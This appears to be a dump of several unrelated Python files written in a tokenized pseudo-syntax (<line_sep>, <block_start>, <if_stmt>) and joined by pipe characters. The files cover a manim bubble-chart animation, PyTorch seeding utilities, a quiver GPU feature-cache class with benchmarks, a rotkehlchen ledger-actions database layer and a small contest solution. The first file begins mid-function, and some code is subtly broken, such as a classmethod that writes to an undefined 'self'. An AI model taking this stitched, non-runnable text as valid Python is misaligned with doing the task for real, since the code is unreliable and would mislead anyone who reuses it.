dumb_dot=Dot(color=BLACK).shift(100<times>UR)<line_sep>intersection_wait_animation=ApplyMethod(dumb_dot.shift 0.1<times>RIGHT run_time=intersection_wait_time)<for_stmt>i,name enumerate(names_to_show)<block_start><if_stmt>name<in>self.entity_names<block_start>indices.append(self.entity_names.index(name))<if_stmt>SHOW_CN_NAMES<block_start>name_to_show=online_translation(name)<block_end><else_stmt><block_start>name_to_show=name<block_end>mid_wait_animation=ApplyMethod(dumb_dot.shift 0.1<times>RIGHT run_time=wait_time[i])<line_sep>old_lables.append(TextMobject(name_to_show color=self.COLORMAT[indices[i]]).scale(0.1))<line_sep>new_lables.append(TextMobject(name_to_show color=self.COLORMAT[indices[i]]).scale(lable_sizes[i]))<line_sep>old_lables[i].move_to(self.coordinates[indices[i] current_time_index])<line_sep>new_lables[i].next_to(self.bubbles.submobjects[indices[i]] directions[i])<line_sep>animation.append(ShowCreation(old_lables[i] run_time=0.02))<line_sep>'''
animation.append(
AnimationGroup(
ReplacementTransform(
old_lables[i],
new_lables[i],
run_time = wiggle_time[i]
),
WiggleOutThenIn(
self.bubbles.submobjects[indices[i]],
scale_value = wiggle_factor[i],
run_time = wiggle_time[i]
)
)
)
'''<line_sep>animation.append([ReplacementTransform(old_lables[i] new_lables[i] run_time=wiggle_time[i]) WiggleOutThenIn(self.bubbles.submobjects[indices[i]] scale_value=wiggle_factor[i] run_time=wiggle_time[i])])<line_sep>animation.append(mid_wait_animation)<if_stmt><not>fadeout_at_once<block_start>animation.append(FadeOut(new_lables[i] run_time=fadeout_time[i]))<block_end>animation.append(intersection_wait_animation)<block_end><block_end><if_stmt>fadeout_at_once<block_start>lables=VGroup()<for_stmt>lable new_lables<block_start>lables.add(lable)<line_sep>print(len(lables.submobjects))<block_end>animation.append(FadeOut(lables run_time=fadeout_time[0]))<block_end>print(len(animation))<line_sep><return>animation<block_end><def_stmt>Time_Update_Animation self t bubble_transform_time=BUBBLE_TRANSFROMATION_RUN_TIME time_lable_run_time=TIME_LABLE_TRANSFROMATION_RUN_TIME show_track=<false># to a specific time, t can be index(integer) within range(0,len(self.times+1))
# or t can be a element in self.times
<block_start>args=[]<line_sep>#if t is not a index, we need to convert it into index
<if_stmt><not>isinstance(t int)<block_start><if_stmt><not>t<in>self.times<block_start><raise>Exception("input argument 't' is not in self.times")<block_end><else_stmt>#if t is not a index, but is a element in self.times
<block_start>t=self.times.index(t)<block_end><block_end>#update the bubbles
new_circles=VGroup()<for_stmt>i,bubbledata enumerate(zip(self.coordinates[: t] self.radiusdata[: t]))<block_start>new_circle=Circle(radius=bubbledata[1] color=self.COLORMAT[i] fill_opacity=FILL_OPACITY).shift(bubbledata[0])<line_sep>new_circles.add(new_circle)<block_end>new_circles,self.bubbles=self.bubbles new_circles<if_stmt><not>show_track<block_start>args.append(ReplacementTransform(new_circles self.bubbles run_time=bubble_transform_time))<block_end><else_stmt><block_start>args.append(Transform(new_circles self.bubbles run_time=bubble_transform_time))<line_sep>'''
#new_circle,self.bubbles.submobjects[i] = self.bubbles.submobjects[i],new_circle
if not show_track:
args.append(
ReplacementTransform(
new_circle,
self.bubbles.submobjects[i],
run_time = bubble_transform_time
)
)
else:
args.append(
Transform(
new_circle,
self.bubbles.submobjects[i],
run_time = bubble_transform_time
)
)
'''<block_end># update the time lable:
<if_stmt>hasattr(self "time_lable")<block_start>new_time_lable=(TextMobject(str(self.times[t]) color=TIME_LABLE_COLOR).scale(TIME_LABLE_SCALE_FACTOR)).shift(TIME_LABLE_POSITION)<line_sep>new_time_lable,self.time_lable=self.time_lable new_time_lable<line_sep>args.append(ReplacementTransform(new_time_lable self.time_lable run_time=time_lable_run_time))<block_end><return>args<block_end><block_end> |
"""Various utilities."""<import_stmt>os<import_stmt>csv<import_stmt>torch<import_stmt>random<import_stmt>numpy<as>np<import_stmt>socket<import_stmt>datetime<def_stmt>system_startup args=<none> defs=<none><block_start>"""Print useful system information."""<line_sep># Choose GPU device and print status information:
device=torch.device('cuda:0')<if>torch.cuda.is_available()<else>torch.device('cpu')<line_sep>setup=dict(device=device dtype=torch.float)# non_blocking=NON_BLOCKING
print('Currently evaluating -------------------------------:')<line_sep>print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))<line_sep>print(f'CPUs: {torch.get_num_threads()}, GPUs: {torch.cuda.device_count()} on {socket.gethostname()}.')<if_stmt>args<is><not><none><block_start>print(args)<block_end><if_stmt>defs<is><not><none><block_start>print(repr(defs))<block_end><if_stmt>torch.cuda.is_available()<block_start>print(f'GPU : {torch.cuda.get_device_name(device=device)}')<block_end><return>setup<block_end><def_stmt>save_to_table out_dir name dryrun **kwargs<block_start>"""Save keys to .csv files. Function adapted from Micah."""<line_sep># Check for file
<if_stmt><not>os.path.isdir(out_dir)<block_start>os.makedirs(out_dir)<block_end>fname=os.path.join(out_dir f'table_{name}.csv')<line_sep>fieldnames=list(kwargs.keys())<line_sep># Read or write header
<try_stmt><block_start><with_stmt>open(fname 'r')<as>f<block_start>reader=csv.reader(f delimiter='\t')<line_sep>header=[line<for>line reader][0]<block_end><block_end><except_stmt>Exception<as>e<block_start>print('Creating a new .csv table...')<with_stmt>open(fname 'w')<as>f<block_start>writer=csv.DictWriter(f delimiter='\t' fieldnames=fieldnames)<line_sep>writer.writeheader()<block_end><block_end><if_stmt><not>dryrun# Add row for this experiment
<block_start><with_stmt>open(fname 'a')<as>f<block_start>writer=csv.DictWriter(f delimiter='\t' fieldnames=fieldnames)<line_sep>writer.writerow(kwargs)<block_end>print('\nResults saved to '+fname+'.')<block_end><else_stmt><block_start>print(f'Would save results to {fname}.')<line_sep>print(f'Would save these keys: {fieldnames}.')<block_end><block_end><def_stmt>set_random_seed seed=233<block_start>"""233 = 144 + 89 is my favorite number."""<line_sep>torch.manual_seed(seed+1)<line_sep>torch.cuda.manual_seed(seed+2)<line_sep>torch.cuda.manual_seed_all(seed+3)<line_sep>np.random.seed(seed+4)<line_sep>torch.cuda.manual_seed_all(seed+5)<line_sep>random.seed(seed+6)<block_end><def_stmt>set_deterministic <block_start>"""Switch pytorch into a deterministic computation mode."""<line_sep>torch.backends.cudnn.deterministic=<true><line_sep>torch.backends.cudnn.benchmark=<false><block_end> |
<import_stmt>torch<import_stmt>torch_quiver<as>torch_qv<import_stmt>random<import_stmt>numpy<as>np<import_stmt>time<import_from_stmt>typing List<import_from_stmt>quiver.shard_tensor ShardTensor ShardTensorConfig Topo<import_from_stmt>quiver.utils reindex_feature<import_stmt>torch.multiprocessing<as>mp<import_from_stmt>torch.multiprocessing Process<import_stmt>os<import_stmt>sys<import_stmt>quiver<import_stmt>torch.distributed<as>dist<import_stmt>torch<import_stmt>torch_quiver<as>torch_qv<import_stmt>random<import_stmt>numpy<as>np<import_stmt>time<import_from_stmt>typing List<import_from_stmt>quiver.shard_tensor ShardTensor ShardTensorConfig Topo<import_from_stmt>quiver.utils reindex_feature<line_sep>__all__=["Feature"]<class_stmt>Feature<block_start><def_stmt>__init__ self rank device_list device_cache_size=0 cache_policy='device_replicate' csr_topo=<none><block_start>self.device_cache_size=device_cache_size<line_sep>self.cache_policy=cache_policy<line_sep>self.device_list=device_list<line_sep>self.device_tensor_list={}<line_sep>self.numa_tensor_list={}<line_sep>self.rank=rank<line_sep>self.topo=Topo(self.device_list)<line_sep>self.csr_topo=csr_topo<line_sep>self.ipc_handle_=<none><block_end><def_stmt>cal_memory_budget_bytes self memory_budget<block_start><if_stmt>isinstance(memory_budget int)<block_start><return>memory_budget<block_end><elif_stmt>isinstance(memory_budget float)<block_start>memory_budget=int(memory_budget)<block_end><elif_stmt>isinstance(memory_budget 
str)<block_start><if_stmt>memory_budget.upper().endswith("M")<or>memory_budget.upper().endswith("MB")<block_start>end=-1<if>memory_budget.upper().endswith("M")<else>-2<line_sep>memory_budget=int(float(memory_budget[:end])<times>1024<times>1024)<block_end><elif_stmt>memory_budget.upper().endswith("G")<or>memory_budget.upper().endswith("GB")<block_start>end=-1<if>memory_budget.upper().endswith("G")<else>-2<line_sep>memory_budget=int(float(memory_budget[:end])<times>1024<times>1024<times>1024)<block_end><block_end><else_stmt><block_start><raise>Exception("memory budget input is not valid")<block_end><return>memory_budget<block_end><def_stmt>cal_size self cpu_tensor cache_memory_budget<block_start>element_size=cpu_tensor.shape[1]<times>4<line_sep>cache_size=cache_memory_budget<floordiv>element_size<line_sep><return>cache_size<block_end><def_stmt>partition self cpu_tensor cache_memory_budget<block_start>cache_size=self.cal_size(cpu_tensor cache_memory_budget)<line_sep><return>[cpu_tensor[:cache_size] cpu_tensor[cache_size:]]<block_end><def_stmt>from_cpu_tensor self cpu_tensor<block_start><if_stmt>self.cache_policy<eq>"device_replicate"<block_start>cache_memory_budget=self.cal_memory_budget_bytes(self.device_cache_size)<line_sep>shuffle_ratio=0.0<block_end><else_stmt><block_start>cache_memory_budget=self.cal_memory_budget_bytes(self.device_cache_size)<times>len(self.topo.Numa2Device[0])<line_sep>shuffle_ratio=self.cal_size(cpu_tensor cache_memory_budget)/cpu_tensor.size(0)<block_end>print(f"LOG>>> {min(100 int(100<times>cache_memory_budget/cpu_tensor.numel()/4))}% data cached")<if_stmt>self.csr_topo<is><not><none><block_start>print("Create")<line_sep>cpu_tensor,self.csr_topo.feature_order=reindex_feature(self.csr_topo cpu_tensor shuffle_ratio)<line_sep>self.feature_order=self.csr_topo.feature_order.to(self.rank)<line_sep>print("Done Create")<block_end>cache_part,self.cpu_part=self.partition(cpu_tensor 
cache_memory_budget)<line_sep>self.cpu_part=self.cpu_part.clone()<if_stmt>cache_part.shape[0]<g>0<and>self.cache_policy<eq>"device_replicate"<block_start><for_stmt>device self.device_list<block_start>shard_tensor=ShardTensor(self.rank ShardTensorConfig({}))<line_sep>shard_tensor.append(cache_part device)<line_sep>self.device_tensor_list[device]=shard_tensor<block_end><block_end><elif_stmt>cache_part.shape[0]<g>0<block_start>numa0_device_list=self.topo.Numa2Device[0]<line_sep>numa1_device_list=self.topo.Numa2Device[1]<line_sep>block_size=self.cal_size(cpu_tensor cache_memory_budget<floordiv>len(self.topo.Numa2Device[0]))<if_stmt>len(numa0_device_list)<g>0<block_start>print(f"LOG>>> GPU {numa0_device_list} belong to the same NUMA Domain")<line_sep>shard_tensor=ShardTensor(self.rank ShardTensorConfig({}))<line_sep>cur_pos=0<for_stmt>idx,device enumerate(numa0_device_list)<block_start><if_stmt>idx<eq>len(numa0_device_list)-1<block_start>shard_tensor.append(cache_part[cur_pos:] device)<block_end><else_stmt><block_start>shard_tensor.append(cache_part[cur_pos:cur_pos+block_size] device)<line_sep>cur_pos<augadd>block_size<block_end><block_end>self.numa_tensor_list[0]=shard_tensor<block_end><if_stmt>len(numa1_device_list)<g>0<block_start>print(f"LOG>>> GPU {numa1_device_list} belong to the same NUMA Domain")<line_sep>shard_tensor=ShardTensor(self.rank ShardTensorConfig({}))<line_sep>cur_pos=0<for_stmt>idx,device enumerate(numa1_device_list)<block_start><if_stmt>idx<eq>len(numa1_device_list)-1<block_start>shard_tensor.append(cache_part[cur_pos:] device)<block_end><else_stmt><block_start>shard_tensor.append(cache_part[cur_pos:cur_pos+block_size] device)<line_sep>cur_pos<augadd>block_size<block_end><block_end>self.numa_tensor_list[1]=shard_tensor<block_end><block_end># ๆๅปบCPU Tensor
<if_stmt>self.cpu_part.numel()<g>0<block_start><if_stmt>self.cache_policy<eq>"device_replicate"<block_start>shard_tensor=self.device_tensor_list.get(self.rank <none>)<or>ShardTensor(self.rank ShardTensorConfig({}))<line_sep>shard_tensor.append(self.cpu_part -1)<line_sep>self.device_tensor_list[self.rank]=shard_tensor<block_end><else_stmt><block_start>numa_id=self.topo.get_numa_node(self.rank)<line_sep>shard_tensor=self.numa_tensor_list.get(numa_id <none>)<or>ShardTensor(self.rank ShardTensorConfig({}))<line_sep>shard_tensor.append(self.cpu_part -1)<line_sep>self.numa_tensor_list[numa_id]=shard_tensor<block_end><block_end><block_end><def_stmt>__getitem__ self node_idx<block_start>self.lazy_init_from_ipc_handle()<line_sep>node_idx=node_idx.to(self.rank)<if_stmt>self.feature_order<is><not><none><block_start>node_idx=self.feature_order[node_idx]<block_end><if_stmt>self.cache_policy<eq>"device_replicate"<block_start>shard_tensor=self.device_tensor_list[self.rank]<line_sep><return>shard_tensor[node_idx]<block_end><else_stmt><block_start>numa_id=self.topo.get_numa_node(self.rank)<line_sep>shard_tensor=self.numa_tensor_list[numa_id]<line_sep><return>shard_tensor[node_idx]<block_end><block_end><def_stmt>size self dim<block_start>self.lazy_init_from_ipc_handle()<if_stmt>self.cache_policy<eq>"device_replicate"<block_start>shard_tensor=self.device_tensor_list[self.rank]<line_sep><return>shard_tensor.size(dim)<block_end><else_stmt><block_start>numa_id=self.topo.get_numa_node(self.rank)<line_sep>shard_tensor=self.numa_tensor_list[numa_id]<line_sep><return>shard_tensor.size(dim)<block_end><block_end>@property<def_stmt>shape 
self<block_start>self.lazy_init_from_ipc_handle()<if_stmt>self.cache_policy<eq>"device_replicate"<block_start>shard_tensor=self.device_tensor_list[self.rank]<line_sep><return>shard_tensor.shape<block_end><else_stmt><block_start>numa_id=self.topo.get_numa_node(self.rank)<line_sep>shard_tensor=self.numa_tensor_list[numa_id]<line_sep><return>shard_tensor.shape<block_end><block_end>@property<def_stmt>ipc_handle self<block_start><return>self.ipc_handle_<block_end>@ipc_handle.setter<def_stmt>ipc_handle self ipc_handle<block_start>self.ipc_handle_=ipc_handle<block_end><def_stmt>share_ipc self<block_start>gpu_ipc_handle_dict={}<if_stmt>self.cache_policy<eq>"device_replicate"<block_start><for_stmt>device self.device_tensor_list<block_start>gpu_ipc_handle_dict[device]=self.device_tensor_list[device].share_ipc()[0]<block_end><block_end><else_stmt><block_start><for_stmt>numa_node self.numa_tensor_list<block_start>gpu_ipc_handle_dict[numa_node]=self.numa_tensor_list[numa_node].share_ipc()[0]<block_end><block_end><return>gpu_ipc_handle_dict self.cpu_part self.device_list self.device_cache_size self.cache_policy self.csr_topo<block_end><def_stmt>from_gpu_ipc_handle_dict self gpu_ipc_handle_dict cpu_tensor<block_start><if_stmt>self.cache_policy<eq>"device_replicate"<block_start>ipc_handle=gpu_ipc_handle_dict.get(self.rank []) cpu_tensor ShardTensorConfig({})<line_sep>shard_tensor=ShardTensor.new_from_share_ipc(ipc_handle self.rank)<line_sep>self.device_tensor_list[self.rank]=shard_tensor<block_end><else_stmt><block_start>numa_node=self.topo.get_numa_node(self.rank)<line_sep>ipc_handle=gpu_ipc_handle_dict.get(numa_node []) cpu_tensor ShardTensorConfig({})<line_sep>shard_tensor=ShardTensor.new_from_share_ipc(ipc_handle self.rank)<line_sep>self.numa_tensor_list[numa_node]=shard_tensor<block_end>self.cpu_part=cpu_tensor<block_end>@classmethod<def_stmt>new_from_ipc_handle cls rank 
ipc_handle<block_start>gpu_ipc_handle_dict,cpu_part,device_list,device_cache_size,cache_policy,csr_topo=ipc_handle<line_sep>feature=cls(rank device_list device_cache_size cache_policy)<line_sep>feature.from_gpu_ipc_handle_dict(gpu_ipc_handle_dict cpu_part)<if_stmt>csr_topo<is><not><none><block_start>feature.feature_order=csr_topo.feature_order.to(rank)<block_end>self.csr_topo=csr_topo<line_sep><return>feature<block_end>@classmethod<def_stmt>lazy_from_ipc_handle cls ipc_handle<block_start>gpu_ipc_handle_dict,cpu_part,device_list,device_cache_size,cache_policy,_=ipc_handle<line_sep>feature=cls(device_list[0] device_list device_cache_size cache_policy)<line_sep>feature.ipc_handle=ipc_handle<line_sep><return>feature<block_end><def_stmt>lazy_init_from_ipc_handle self<block_start><if_stmt>self.ipc_handle<is><none><block_start><return><block_end>self.rank=torch.cuda.current_device()<line_sep>gpu_ipc_handle_dict,cpu_part,device_list,device_cache_size,cache_policy,csr_topo=self.ipc_handle<line_sep>self.from_gpu_ipc_handle_dict(gpu_ipc_handle_dict cpu_part)<line_sep>self.csr_topo=csr_topo<if_stmt>csr_topo<is><not><none><block_start>self.feature_order=csr_topo.feature_order.to(self.rank)<block_end>self.ipc_handle=<none><block_end><block_end><import_from_stmt>multiprocessing.reduction ForkingPickler<def_stmt>rebuild_feature ipc_handle<block_start>print("check rebuild")<line_sep>feature=Feature.lazy_from_ipc_handle(ipc_handle)<line_sep><return>feature<block_end><def_stmt>reduce_feature feature<block_start>ipc_handle=feature.share_ipc()<line_sep><return>(rebuild_feature (ipc_handle ))<block_end><def_stmt>rebuild_pyg_sampler cls ipc_handle<block_start>sampler=cls.lazy_from_ipc_handle(ipc_handle)<line_sep><return>sampler<block_end><def_stmt>reduce_pyg_sampler sampler<block_start>ipc_handle=sampler.share_ipc()<line_sep><return>(rebuild_pyg_sampler (type(sampler) ipc_handle ))<block_end><def_stmt>init_reductions <block_start>ForkingPickler.register(Feature 
reduce_feature)<block_end><def_stmt>test_feature_basic <block_start>rank=0<line_sep>NUM_ELEMENT=1000000<line_sep>SAMPLE_SIZE=80000<line_sep>FEATURE_DIM=600<line_sep>#########################
# Init With Numpy
########################
torch.cuda.set_device(rank)<line_sep>host_tensor=np.random.randint(0 high=10 size=(2<times>NUM_ELEMENT FEATURE_DIM))<line_sep>tensor=torch.from_numpy(host_tensor).type(torch.float32)<line_sep>host_indice=np.random.randint(0 2<times>NUM_ELEMENT-1 (SAMPLE_SIZE ))<line_sep>indices=torch.from_numpy(host_indice).type(torch.long)<line_sep>print("host data size" host_tensor.size<times>4<floordiv>1024<floordiv>1024 "MB")<line_sep>device_indices=indices.to(rank)<line_sep>############################
# define a quiver.Feature
###########################
feature=quiver.Feature(rank=rank device_list=[0 1 2 3] device_cache_size="0.9G" cache_policy="numa_replicate")<line_sep>feature.from_cpu_tensor(tensor)<line_sep>####################
# Indexing
####################
res=feature[device_indices]<line_sep>start=time.time()<line_sep>res=feature[device_indices]<line_sep>consumed_time=time.time()-start<line_sep>res=res.cpu().numpy()<line_sep>feature_gt=tensor[indices].numpy()<line_sep>print("Correctness Check : " np.array_equal(res feature_gt))<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {res.size<times>4/consumed_time/1024/1024/1024} GB/s, consumed {consumed_time}s")<block_end><def_stmt>child_proc rank world_size host_tensor feature<block_start>torch.cuda.set_device(rank)<line_sep>print(f"Process {os.getpid()}: check current device {torch.cuda.current_device()}")<line_sep>NUM_ELEMENT=host_tensor.shape[0]<line_sep>SAMPLE_SIZE=80000<line_sep>device_tensor=host_tensor.to(rank)<line_sep>bandwidth=[]<for_stmt>_ range(30)<block_start>device_indices=torch.randint(0 NUM_ELEMENT-1 (SAMPLE_SIZE ) device=rank)<line_sep>torch.cuda.synchronize()<line_sep>start=time.time()<line_sep>res=feature[device_indices]<line_sep>consumed_time=time.time()-start<line_sep>bandwidth.append(res.numel()<times>4/consumed_time/1024/1024/1024)<assert_stmt>torch.equal(res device_tensor[device_indices])<block_end>print("Correctness check passed")<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {np.mean(np.array(bandwidth[1:]))} GB/s, consumed {consumed_time}s, res size {res.numel()<times>4/1024/1024/1024}GB")<block_end><def_stmt>test_ipc <block_start>rank=0<line_sep>NUM_ELEMENT=1000000<line_sep>FEATURE_DIM=600<line_sep>#########################
# Init With Numpy
########################
torch.cuda.set_device(rank)<line_sep>host_tensor=np.random.randint(0 high=10 size=(2<times>NUM_ELEMENT FEATURE_DIM))<line_sep>tensor=torch.from_numpy(host_tensor).type(torch.float32)<line_sep>print("host data size" host_tensor.size<times>4<floordiv>1024<floordiv>1024 "MB")<line_sep>############################
# define a quiver.Feature
###########################
feature=quiver.Feature(rank=rank device_list=[0 1] device_cache_size=0 cache_policy="numa_replicate")<line_sep>feature.from_cpu_tensor(tensor)<line_sep>world_size=2<line_sep>mp.spawn(child_proc args=(world_size tensor feature) nprocs=world_size join=<true>)<block_end><def_stmt>child_proc_real_data rank feature host_tensor<block_start>NUM_ELEMENT=2000000<line_sep>SAMPLE_SIZE=800000<line_sep>bandwidth=[]<line_sep>torch.cuda.set_device(rank)<line_sep>device_tensor=host_tensor.to(rank)<for_stmt>_ range(300)<block_start>device_indices=torch.randint(0 NUM_ELEMENT-1 (SAMPLE_SIZE ) device=rank)<line_sep>torch.cuda.synchronize()<line_sep>start=time.time()<line_sep>res=feature[device_indices]<line_sep>consumed_time=time.time()-start<line_sep>bandwidth.append(res.numel()<times>4/consumed_time/1024/1024/1024)<assert_stmt>torch.equal(device_tensor[device_indices] res)<block_end>print("Correctness check passed")<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {np.mean(np.array(bandwidth[1:]))} GB/s, consumed {consumed_time}s, res size {res.numel()<times>4/1024/1024/1024}GB")<block_end><def_stmt>test_ipc_with_real_data <block_start><import_from_stmt>ogb.nodeproppred PygNodePropPredDataset<line_sep>root="/data/data/products"<line_sep>dataset=PygNodePropPredDataset('ogbn-products' root)<line_sep>data=dataset[0]<line_sep>world_size=torch.cuda.device_count()<line_sep>##############################
# Create Sampler And Feature
##############################
csr_topo=quiver.CSRTopo(data.edge_index)<line_sep>feature=torch.zeros(data.x.shape)<line_sep>feature[:]=data.x<line_sep>quiver_feature=Feature(rank=0 device_list=list(range(world_size)) device_cache_size="200M" cache_policy="device_replicate" csr_topo=csr_topo)<line_sep>quiver_feature.from_cpu_tensor(feature)<line_sep>print('Let\'s use' world_size 'GPUs!')<line_sep>mp.spawn(child_proc_real_data args=(quiver_feature feature) nprocs=world_size join=<true>)<block_end><def_stmt>normal_test <block_start>rank=0<line_sep>NUM_ELEMENT=1000000<line_sep>FEATURE_DIM=600<line_sep>SAMPLE_SIZE=80000<line_sep>#########################
# Init With Numpy
########################
torch.cuda.set_device(rank)<line_sep>host_tensor=np.random.randint(0 high=10 size=(2<times>NUM_ELEMENT FEATURE_DIM))<line_sep>tensor=torch.from_numpy(host_tensor).type(torch.float32)<line_sep>host_indice=np.random.randint(0 2<times>NUM_ELEMENT-1 (SAMPLE_SIZE ))<line_sep>indices=torch.from_numpy(host_indice).type(torch.long)<line_sep>tensor.to(rank)<line_sep>torch.cuda.synchronize()<line_sep>start=time.time()<line_sep>feature=tensor[indices]<line_sep>feature=feature.to(rank)<line_sep>torch.cuda.synchronize()<line_sep>consumed_time=time.time()-start<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {feature.numel()<times>4/consumed_time/1024/1024/1024} GB/s, consumed {consumed_time}s")<block_end><def_stmt>test_paper100M <block_start>dataset=torch.load("/data/papers/ogbn_papers100M/quiver_preprocess/paper100M.pth")<line_sep>csr_topo=dataset["csr_topo"]<line_sep>feature=dataset["sorted_feature"]<line_sep>NUM_ELEMENT=feature.shape[0]<line_sep>SAMPLE_SIZE=80000<line_sep>world_size=4<line_sep>rank=0<line_sep>dataset["label"]=torch.from_numpy(dataset["label"])<line_sep>dataset["num_features"]=feature.shape[1]<line_sep>dataset["num_classes"]=172<line_sep>quiver_sampler=quiver.pyg.GraphSageSampler(csr_topo [15 10 5] 0 mode="UVA")<line_sep>quiver_feature=quiver.Feature(rank=0 device_list=list(range(world_size)) device_cache_size="12G" cache_policy="numa_replicate")<line_sep>quiver_feature.from_cpu_tensor(feature)<line_sep>device_indices=torch.randint(0 NUM_ELEMENT-1 (SAMPLE_SIZE ) device=rank)<line_sep>res=quiver_feature[device_indices]<line_sep>start=time.time()<line_sep>res=quiver_feature[device_indices]<line_sep>consumed_time=time.time()-start<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {res.numel()<times>4/consumed_time/1024/1024/1024} GB/s, consumed {consumed_time}s")<block_end><if_stmt>__name__<eq>"__main__"<block_start>mp.set_start_method("spawn")<line_sep>torch_qv.init_p2p([0 1 2 
3])<line_sep>test_paper100M()<line_sep>#init_reductions()
#test_feature_basic()
#test_ipc()
#normal_test()
#test_ipc_with_real_data()
<block_end> |
<import_stmt>logging<import_from_stmt>typing TYPE_CHECKING List Optional Tuple<import_from_stmt>pysqlcipher3 dbapi2<as>sqlcipher<import_from_stmt>rotkehlchen.accounting.ledger_actions LedgerAction<import_from_stmt>rotkehlchen.constants.limits FREE_LEDGER_ACTIONS_LIMIT<import_from_stmt>rotkehlchen.db.filtering LedgerActionsFilterQuery<import_from_stmt>rotkehlchen.errors.asset UnknownAsset<import_from_stmt>rotkehlchen.errors.serialization DeserializationError<import_from_stmt>rotkehlchen.logging RotkehlchenLogsAdapter<import_from_stmt>rotkehlchen.user_messages MessagesAggregator<line_sep>logger=logging.getLogger(__name__)<line_sep>log=RotkehlchenLogsAdapter(logger)<if_stmt>TYPE_CHECKING<block_start><import_from_stmt>rotkehlchen.db.dbhandler DBHandler<block_end><class_stmt>DBLedgerActions()<block_start><def_stmt>__init__ self database:'DBHandler' msg_aggregator:MessagesAggregator<block_start>self.db=database<line_sep>self.msg_aggregator=msg_aggregator<block_end><def_stmt>get_ledger_actions_and_limit_info self filter_query:LedgerActionsFilterQuery has_premium:bool <arrow>Tuple[List[LedgerAction] int]<block_start>"""Gets all ledger actions for the query from the DB
Also returns how many are the total found for the filter
"""<line_sep>actions=self.get_ledger_actions(filter_query=filter_query has_premium=has_premium)<line_sep>cursor=self.db.conn.cursor()<line_sep>query,bindings=filter_query.prepare(with_pagination=<false>)<line_sep>query='SELECT COUNT(*) from ledger_actions '+query<line_sep>total_found_result=cursor.execute(query bindings)<line_sep><return>actions total_found_result.fetchone()[0]<block_end><def_stmt>get_ledger_actions self filter_query:LedgerActionsFilterQuery has_premium:bool <arrow>List[LedgerAction]<block_start>"""Returns a list of ledger actions optionally filtered by the given filter.
Returned list is ordered according to the passed filter query
"""<line_sep>cursor=self.db.conn.cursor()<line_sep>query_filter,bindings=filter_query.prepare()<if_stmt>has_premium<block_start>query='SELECT * from ledger_actions '+query_filter<line_sep>results=cursor.execute(query bindings)<block_end><else_stmt><block_start>query='SELECT * FROM (SELECT * from ledger_actions ORDER BY timestamp DESC LIMIT ?) '+query_filter# noqa: E501
results=cursor.execute(query [FREE_LEDGER_ACTIONS_LIMIT]+bindings)<block_end>actions=[]<for_stmt>result results<block_start><try_stmt><block_start>action=LedgerAction.deserialize_from_db(result)<block_end><except_stmt>DeserializationError<as>e<block_start>self.msg_aggregator.add_error(f'Error deserializing Ledger Action from the DB. Skipping it.'<concat>f'Error was: {str(e)}' )<line_sep><continue><block_end><except_stmt>UnknownAsset<as>e<block_start>self.msg_aggregator.add_error(f'Error deserializing Ledger Action from the DB. Skipping it. '<concat>f'Unknown asset {e.asset_name} found' )<line_sep><continue><block_end>actions.append(action)<block_end><return>actions<block_end><def_stmt>add_ledger_action self action:LedgerAction<arrow>int<block_start>"""Adds a new ledger action to the DB and returns its identifier for success
May raise:
- sqlcipher.IntegrityError if there is a conflict at addition in _add_gitcoin_extra_data.
If this error is raised connection needs to be rolled back by the caller.
"""<line_sep>cursor=self.db.conn.cursor()<line_sep>query="""
INSERT INTO ledger_actions(
timestamp, type, location, amount, asset, rate, rate_asset, link, notes
)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);"""<line_sep>cursor.execute(query action.serialize_for_db())<line_sep>identifier=cursor.lastrowid<line_sep>action.identifier=identifier<line_sep>self.db.conn.commit()<line_sep><return>identifier<block_end><def_stmt>add_ledger_actions self actions:List[LedgerAction]<arrow><none><block_start>"""Adds multiple ledger action to the DB
Is slow due to not using executemany since the ledger actions table
utilized an auto generated primary key.
"""<for_stmt>action actions<block_start><try_stmt><block_start>self.add_ledger_action(action)<block_end><except_stmt>sqlcipher.IntegrityError# pylint: disable=no-member
<block_start>self.db.msg_aggregator.add_warning('Did not add ledger action to DB due to it already existing')# noqa: E501
log.warning(f'Did not add ledger action {action} to the DB due to it already existing')# noqa: E501
self.db.conn.rollback()<block_end><block_end><block_end># undo the addition and rollack to last commit
<def_stmt>remove_ledger_action self identifier:int<arrow>Optional[str]<block_start>"""Removes a ledger action from the DB by identifier
Returns None for success or an error message for error
"""<line_sep>error_msg=<none><line_sep>cursor=self.db.conn.cursor()<line_sep>cursor.execute('DELETE from ledger_actions WHERE identifier = ?;' (identifier ) )<if_stmt>cursor.rowcount<l>1<block_start>error_msg=(f'Tried to delete ledger action with identifier {identifier} but '<concat>f'it was not found in the DB')<block_end>self.db.conn.commit()<line_sep><return>error_msg<block_end><def_stmt>edit_ledger_action self action:LedgerAction<arrow>Optional[str]<block_start>"""Edits a ledger action from the DB by identifier
Does not edit the extra data at the moment
Returns None for success or an error message for error
"""<line_sep>error_msg=<none><line_sep>cursor=self.db.conn.cursor()<line_sep>query="""
UPDATE ledger_actions SET timestamp=?, type=?, location=?, amount=?,
asset=?, rate=?, rate_asset=?, link=?, notes=? WHERE identifier=?"""<line_sep>db_action_tuple=action.serialize_for_db()<line_sep>cursor.execute(query (*db_action_tuple action.identifier))<if_stmt>cursor.rowcount<ne>1<block_start>error_msg=(f'Tried to edit ledger action with identifier {action.identifier} '<concat>f'but it was not found in the DB')<block_end>self.db.conn.commit()<line_sep><return>error_msg<block_end><block_end> |
<import_stmt>foundations<import_from_stmt>integration.test_consumers TestConsumers<line_sep> |
# https://judge.kimiyuki.net/problem/sum-sum-plus-one-lt
<import_from_stmt>typing *<def_stmt>solve a:List[int]<arrow>int<block_start>n=len(a)<line_sep>ans=0<for_stmt>i range(n)<block_start><for_stmt>j range(i+1 n)<block_start>ans<augadd>a[i]-a[j]<block_end><block_end><return>ans<block_end><def_stmt>main <arrow><none><block_start>n=int(input())<line_sep>a=list(map(int input().split()))<assert_stmt>len(a)<eq>n<line_sep>ans=solve(a)<line_sep>print(ans)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end> |
